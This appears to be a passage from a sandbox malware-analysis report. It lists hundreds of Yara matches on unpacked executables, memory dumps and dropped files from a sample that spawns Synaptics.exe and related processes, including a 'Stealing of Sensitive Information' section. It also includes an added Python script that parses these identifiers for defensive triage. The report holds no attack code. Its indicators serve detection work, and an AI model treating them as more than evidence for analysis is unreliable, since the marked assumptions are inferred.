            Source: Yara matchFile source: 21.0.Synaptics.exe.400000.16.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.Synaptics.exe.3f07d70.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.2.Synaptics.exe.4c4d1c.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.4b8e54.19.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.0.._cache_y8kdmHi6x3.exe.3c0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.400000.12.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.4b8e54.19.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.400000.21.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4b8e54.34.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4b8e54.23.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.y8kdmHi6x3.exe.4b8e54.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.Synaptics.exe.46d40a4.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.Synaptics.exe.4eb40a4.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.Synaptics.exe.4b8e54.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.26.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.4b8e54.19.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.Synaptics.exe.46af190.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.y8kdmHi6x3.exe.45f40a4.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.Synaptics.exe.44e7d70.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.4b8e54.23.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.400000.16.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.400000.21.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.0.._cache_y8kdmHi6x3.exe.3cf0c8.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4c4d1c.18.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.Synaptics.exe.46dff6c.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.Synaptics.exe.4ebff6c.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.4c4d1c.23.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.4b8e54.24.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.400000.10.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.400000.14.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.2.Synaptics.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.Synaptics.exe.48af190.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.Synaptics.exe.4eb40a4.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.Synaptics.exe.4dba750.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.Synaptics.exe.4320940.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.Synaptics.exe.4bba750.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.y8kdmHi6x3.exe.3c60940.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.Synaptics.exe.3d40940.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.Synaptics.exe.4520940.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000002.558804825.0000000000DA2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000018.00000002.401049585.0000000000E7F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000000.401578463.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000000.404128666.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000024.00000000.426967542.0000000000842000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000018.00000000.392435877.0000000000E7F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000000.403770740.0000000000862000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000000.420990382.00000000000FF000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000000.388059549.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000024.00000002.442628618.0000000000842000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000002.431447633.00000000000FF000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000000.390475509.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000019.00000002.413670718.0000000000382000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000002.425456929.0000000000862000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000000.386810827.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.422157438.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000000.384287270.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.526679054.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001B.00000000.400361614.0000000000E7F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001B.00000002.406913050.0000000000E7F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.326093400.0000000003A99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000000.429485363.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000000.443173289.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000000.317487314.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000000.327639082.0000000000DA2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000000.323345675.00000000003CF000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.401818941.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000019.00000000.395835615.0000000000382000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.329527934.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.330595199.00000000003CF000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000000.316599175.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.392491539.0000000004159000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.427064129.0000000004359000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.404592341.0000000004B59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.434303523.0000000004D59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.423679022.0000000004579000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.330915609.0000000004499000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.401697054.0000000003B79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: y8kdmHi6x3.exe PID: 5268, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: y8kdmHi6x3.exe PID: 4844, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: ._cache_y8kdmHi6x3.exe PID: 6232, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: SYSTEM32.EXE PID: 6952, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 6964, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 4928, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 6632, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 5684, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 4964, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 5976, type: MEMORYSTR
            Source: Yara matchFile source: C:\Users\user\Desktop\SYSTEM32.EXE, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe, type: DROPPED
            Source: Yara matchFile source: C:\ProgramData\Synaptics\._cache_Synaptics.exe, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\Desktop\._cache_Synaptics.exe, type: DROPPED
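The Yara evidence lists on this page (the one above and the "Stealing of Sensitive Information" list that follows it) run to several hundred rows, and the useful triage signal is buried in the identifiers: which sandbox process index a hit belongs to, whether it fired in the mapped image or in private (injected or unpacked) memory, and whether the carved PE is the raw bytes or a rebuilt file. The script below is an added example, not part of the Joe Sandbox report or of the Joe Sandbox tooling: it parses those identifiers and groups the hits per process. The field layouts it decodes are inferred from the naming pattern visible in this report, and the meaning of the phase digit (0 at process start, 2 at process end) and of the seventh `.sdmp` field (taken to be the Win32 `MEMORY_BASIC_INFORMATION.Type` of the region) are assumptions, labelled as such in the code. The ten sample rows are taken from the lists on this page; the line regex accepts both the normalised "Yara match, File source:" form and the run-together "Yara matchFile source:" form that text extraction produces.

```python
"""Added example (not from the Joe Sandbox report): parse the identifiers in a
'Yara match' evidence list and group hits per process.  Field meanings marked
'assumption' are inferred from the report's own naming pattern."""
import re
from collections import Counter, defaultdict
from dataclasses import dataclass
from typing import Optional

# Ten rows taken from the report (raw string because of the Windows path).
SAMPLE = r"""
Source: Yara match, File source: 21.0.Synaptics.exe.4c4d1c.17.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 6.2.._cache_y8kdmHi6x3.exe.3c0000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 7.2.SYSTEM32.EXE.da0000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000007.00000002.558804825.0000000000DA2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.326093400.0000000003A99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000014.00000000.386810827.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: SYSTEM32.EXE PID: 6952, type: MEMORYSTR
Source: Yara match, File source: C:\Users\user\Desktop\SYSTEM32.EXE, type: DROPPED
Source: Yara match, File source: 0000000B.00000002.562480973.00000000059E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 19.2.dhcpmon.exe.46231f5.4.raw.unpack, type: UNPACKEDPE
"""

# Accepts "Yara match, File source:" and the run-together "Yara matchFile source:".
LINE_RE = re.compile(r"^Source: Yara match,?\s*File source: (?P<src>.+), type: (?P<kind>\w+)$")

# <process index>.<phase>.<image name>.<base hex>.<dump no>[.raw].unpack
# Assumption: phase 0 = dumped at process start, 2 = at process end;
# ".raw" = carved bytes as found, otherwise a PE rebuilt by the sandbox.
UNPACK_RE = re.compile(
    r"^(?P<proc>\d+)\.(?P<phase>\d)\.(?P<name>.+\.(?:exe|dll))\."
    r"(?P<base>[0-9a-f]+)\.(?P<idx>\d+)(?P<raw>\.raw)?\.unpack$", re.IGNORECASE)

# <process index>.<phase>.<dump id>.<base>.<flag>.<flag>.<type>.<module no>.sdmp
# Assumption: the seventh field is MEMORY_BASIC_INFORMATION.Type; the observed
# values 01000000 / 00020000 / 00040000 match MEM_IMAGE / MEM_PRIVATE / MEM_MAPPED.
SDMP_RE = re.compile(
    r"^(?P<proc>[0-9A-F]{8})\.(?P<phase>[0-9A-F]{8})\.(?P<dump>\d+)\."
    r"(?P<base>[0-9A-F]{16})\.[0-9A-F]{8}\.[0-9A-F]{8}\.(?P<mtype>[0-9A-F]{8})\."
    r"[0-9A-F]{8}\.sdmp$")
MEM_TYPES = {0x1000000: "MEM_IMAGE", 0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED"}

MEMSTR_RE = re.compile(r"^Process Memory Space: (?P<name>.+) PID: (?P<pid>\d+)$")


@dataclass
class Match:
    kind: str             # UNPACKEDPE, MEMORY, MEMORYSTR or DROPPED
    source: str           # identifier exactly as printed in the report
    proc: Optional[int]   # sandbox process index (None when not encoded)
    name: Optional[str]   # image name where the identifier carries one
    base: Optional[int]   # base address of the carved PE or memory region
    phase: Optional[int]  # 0 = process start, 2 = process end (assumption)
    detail: str           # "raw"/"rebuilt", MEM_* type, or OS pid


def parse_line(line: str) -> Optional[Match]:
    """Return a Match for one evidence row, or None for any other line."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    src, kind = m["src"], m["kind"]
    if kind == "UNPACKEDPE":
        u = UNPACK_RE.match(src)
        if not u:
            raise ValueError(f"unrecognised UNPACKEDPE id: {src}")
        return Match(kind, src, int(u["proc"]), u["name"], int(u["base"], 16),
                     int(u["phase"]), "raw" if u["raw"] else "rebuilt")
    if kind == "MEMORY":
        s = SDMP_RE.match(src)
        if not s:
            raise ValueError(f"unrecognised .sdmp id: {src}")
        mtype = int(s["mtype"], 16)
        return Match(kind, src, int(s["proc"], 16), None, int(s["base"], 16),
                     int(s["phase"], 16), MEM_TYPES.get(mtype, f"type=0x{mtype:x}"))
    if kind == "MEMORYSTR":
        p = MEMSTR_RE.match(src)
        if not p:
            raise ValueError(f"unrecognised MEMORYSTR id: {src}")
        return Match(kind, src, None, p["name"], None, None, f"pid={p['pid']}")
    if kind == "DROPPED":
        return Match(kind, src, None, src.rsplit("\\", 1)[-1], None, None, "")
    raise ValueError(f"unknown evidence type: {kind}")


def parse_report(text: str) -> list[Match]:
    return [m for m in map(parse_line, text.splitlines()) if m]


def kinds_by_process(matches: list[Match]) -> dict[int, Counter]:
    """Process index -> count of hits per evidence kind."""
    out: dict[int, Counter] = defaultdict(Counter)
    for m in matches:
        if m.proc is not None:
            out[m.proc][m.kind] += 1
    return dict(out)


def hits_in_private_memory(matches: list[Match]) -> list[int]:
    """Processes where a rule fired in MEM_PRIVATE memory rather than in the
    mapped image: that is where an injected or unpacked payload lives, so
    these are the dumps to pull first."""
    return sorted({m.proc for m in matches
                   if m.kind == "MEMORY" and m.detail == "MEM_PRIVATE"})


if __name__ == "__main__":
    ms = parse_report(SAMPLE)
    for proc, kinds in sorted(kinds_by_process(ms).items()):
        print(f"process {proc:2d}: {dict(kinds)}")
    print("private-memory hits in processes:", hits_in_private_memory(ms))
```

Run against the full list, the per-process counts show immediately that the same process index appears with both a carved PE and a memory hit (index 7, SYSTEM32.EXE, in the sample), and the private-memory filter separates hits on the on-disk image from hits on code the sample wrote into memory at run time. Note that the PID in a MEMORYSTR row is the OS process ID, not the sandbox process index used by the other two identifier forms, so the script does not try to join on it.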

            Stealing of Sensitive Information

            Source: Yara match, File source: 11.0.._cache_WINDOWS.EXE.5b0000.0.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 16.2.._cache_WINDOWS.EXE.d70000.0.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 20.2.Synaptics.exe.584130.3.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 16.0.._cache_WINDOWS.EXE.d70000.0.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 20.0.Synaptics.exe.584130.24.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 16.2.._cache_WINDOWS.EXE.437ebcc.4.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 20.0.Synaptics.exe.584130.29.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 21.0.Synaptics.exe.584130.22.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 21.0.Synaptics.exe.584130.18.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 15.2.Synaptics.exe.4dba750.5.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 6.2.._cache_y8kdmHi6x3.exe.48e4dc.1.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 11.2.._cache_WINDOWS.EXE.59e0000.7.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 20.0.Synaptics.exe.584130.17.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 4.0.y8kdmHi6x3.exe.4c4d1c.17.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 20.2.Synaptics.exe.584130.3.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 20.0.Synaptics.exe.4b8e54.23.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 6.0.._cache_y8kdmHi6x3.exe.48e4dc.1.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 20.0.Synaptics.exe.4b8e54.19.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 21.2.Synaptics.exe.4b8e54.3.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 4.0.y8kdmHi6x3.exe.4c4d1c.23.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 9.0.WINDOWS.EXE.4b8e14.1.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 11.2.._cache_WINDOWS.EXE.5b0000.0.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 8.2.Synaptics.exe.4cb40a4.5.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 19.2.dhcpmon.exe.46231f5.4.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 23.0.Synaptics.exe.584130.18.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 21.2.Synaptics.exe.584130.2.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 21.0.Synaptics.exe.584130.22.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 21.0.Synaptics.exe.584130.18.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 21.0.Synaptics.exe.400000.21.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 20.0.Synaptics.exe.584130.32.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 23.0.Synaptics.exe.400000.6.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 4.2.y8kdmHi6x3.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 4.2.y8kdmHi6x3.exe.4b8e54.3.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 4.0.y8kdmHi6x3.exe.400000.16.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 20.0.Synaptics.exe.4b8e54.28.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 21.2.Synaptics.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 4.0.y8kdmHi6x3.exe.400000.6.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 21.0.Synaptics.exe.4b8e54.24.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 0.2.y8kdmHi6x3.exe.45f40a4.4.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 20.0.Synaptics.exe.4c4d1c.22.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 23.0.Synaptics.exe.400000.8.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 4.0.y8kdmHi6x3.exe.4b8e54.24.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 4.0.y8kdmHi6x3.exe.4b8e54.19.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 20.0.Synaptics.exe.4c4d1c.27.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 4.0.y8kdmHi6x3.exe.4b8e54.19.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 4.0.y8kdmHi6x3.exe.400000.10.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 0.2.y8kdmHi6x3.exe.44fa750.5.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 21.0.Synaptics.exe.4c4d1c.17.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 20.0.Synaptics.exe.4b8e54.34.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 6.2.._cache_y8kdmHi6x3.exe.3c0000.0.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 20.2.Synaptics.exe.4c4d1c.1.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 23.0.Synaptics.exe.400000.12.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 6.0.._cache_y8kdmHi6x3.exe.48e4dc.1.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 21.0.Synaptics.exe.4b8e54.24.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 21.0.Synaptics.exe.400000.12.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 23.0.Synaptics.exe.400000.10.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 20.0.Synaptics.exe.400000.10.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 9.2.WINDOWS.EXE.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 23.2.Synaptics.exe.4b8e54.3.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 4.0.y8kdmHi6x3.exe.400000.8.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 16.2.._cache_WINDOWS.EXE.437ebcc.4.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 21.2.Synaptics.exe.4c4d1c.1.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 23.0.Synaptics.exe.4b8e54.23.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 20.0.Synaptics.exe.400000.16.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 11.2.._cache_WINDOWS.EXE.3bdebcc.4.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 20.0.Synaptics.exe.4b8e54.28.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 20.0.Synaptics.exe.584130.29.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 20.0.Synaptics.exe.400000.12.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 19.0.dhcpmon.exe.e20000.0.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 23.0.Synaptics.exe.584130.24.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 11.2.._cache_WINDOWS.EXE.3be31f5.2.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 4.2.y8kdmHi6x3.exe.584130.2.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 9.0.WINDOWS.EXE.4b8e14.1.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 23.0.Synaptics.exe.4c4d1c.17.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 23.0.Synaptics.exe.584130.24.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 8.2.Synaptics.exe.4cbff6c.6.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 20.2.Synaptics.exe.4b8e54.2.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 23.0.Synaptics.exe.400000.14.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 19.2.dhcpmon.exe.4619d96.3.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 4.0.y8kdmHi6x3.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 20.2.Synaptics.exe.4b8e54.2.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 8.2.Synaptics.exe.4cb40a4.5.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 23.2.Synaptics.exe.4c4d1c.1.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 21.0.Synaptics.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 19.2.dhcpmon.exe.461ebcc.2.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 23.2.Synaptics.exe.584130.2.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 21.0.Synaptics.exe.400000.8.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 4.2.y8kdmHi6x3.exe.584130.2.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 11.2.._cache_WINDOWS.EXE.3bd9d96.3.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 12.2.Synaptics.exe.45da750.4.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 20.0.Synaptics.exe.400000.31.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 20.0.Synaptics.exe.400000.8.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 20.0.Synaptics.exe.4c4d1c.33.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 20.0.Synaptics.exe.584130.24.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 20.0.Synaptics.exe.400000.21.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 23.0.Synaptics.exe.4c4d1c.22.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 23.2.Synaptics.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 6.0.._cache_y8kdmHi6x3.exe.3cf0c8.2.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 21.0.Synaptics.exe.4b8e54.19.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 21.2.Synaptics.exe.4b8e54.3.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 4.0.y8kdmHi6x3.exe.584130.18.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 4.2.y8kdmHi6x3.exe.4c4d1c.1.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 20.0.Synaptics.exe.584130.17.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 0.2.y8kdmHi6x3.exe.45fff6c.6.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 12.2.Synaptics.exe.46d40a4.6.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 20.0.Synaptics.exe.4b8e54.19.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 21.0.Synaptics.exe.400000.14.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 11.2.._cache_WINDOWS.EXE.59e0000.7.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 0.2.y8kdmHi6x3.exe.44fa750.5.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 6.2.._cache_y8kdmHi6x3.exe.3cf0c8.2.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 16.2.._cache_WINDOWS.EXE.4379d96.3.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 20.0.Synaptics.exe.400000.14.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 21.0.Synaptics.exe.400000.6.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 4.0.y8kdmHi6x3.exe.584130.18.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 23.0.Synaptics.exe.584130.18.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 4.0.y8kdmHi6x3.exe.584130.22.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 21.0.Synaptics.exe.400000.16.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 6.2.._cache_y8kdmHi6x3.exe.48e4dc.1.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 23.0.Synaptics.exe.4b8e54.19.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 6.0.._cache_y8kdmHi6x3.exe.3c0000.0.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 16.2.._cache_WINDOWS.EXE.43831f5.2.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 12.2.Synaptics.exe.45da750.4.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 4.0.y8kdmHi6x3.exe.400000.12.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 9.2.WINDOWS.EXE.4b8e14.1.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 21.0.Synaptics.exe.4b8e54.19.raw.unpack, type: UNPACKEDPE
